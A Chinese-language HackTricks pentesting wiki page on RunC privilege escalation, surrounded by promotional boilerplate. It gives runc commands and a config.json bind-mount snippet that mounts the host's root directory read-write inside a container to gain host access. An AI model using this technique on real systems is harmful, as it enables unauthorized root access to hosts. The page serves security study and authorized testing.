RunC Privilege Escalation

从零开始学习 AWS 黑客技术，成为 htARTE (HackTricks AWS 红队专家)！

支持 HackTricks 的其他方式：

如果您希望在 HackTricks 中看到您的公司广告 或 下载 HackTricks 的 PDF，请查看订阅计划！
获取 官方 PEASS & HackTricks 商品
发现 PEASS 家族，我们独家的 NFTs 集合
加入 💬 Discord 群组 或 telegram 群组 或在 Twitter 🐦 上关注我 @carlospolopm。
通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享您的黑客技巧。

基本信息

如果您想了解更多关于 runc 的信息，请查看以下页面：

PE

如果您发现宿主机中安装了 runc，您可能能够运行一个容器，挂载宿主机的根 / 目录。

runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder

Inside the "mounts" section of the create config.json add the following lines:
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},

#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs

# Finally, start the container
# The root folder is the one from the host
runc run demo

这并不总是有效的，因为runc的默认操作是以root身份运行，所以以非特权用户身份运行它根本无法工作（除非你有一个rootless配置）。将rootless配置设置为默认并不是一个好主意，因为在rootless容器内部有很多限制在rootless容器外部不适用。

从零开始学习AWS黑客攻击直到成为专家，通过 htARTE (HackTricks AWS Red Team Expert)！

其他支持HackTricks的方式：

如果你想在HackTricks上看到你的公司广告或者下载HackTricks的PDF，请查看订阅计划！
获取官方PEASS & HackTricks商品
发现PEASS家族，我们独家的NFTs系列
加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享你的黑客技巧。

上一页Payloads to execute 下一页SELinux

最后更新于1年前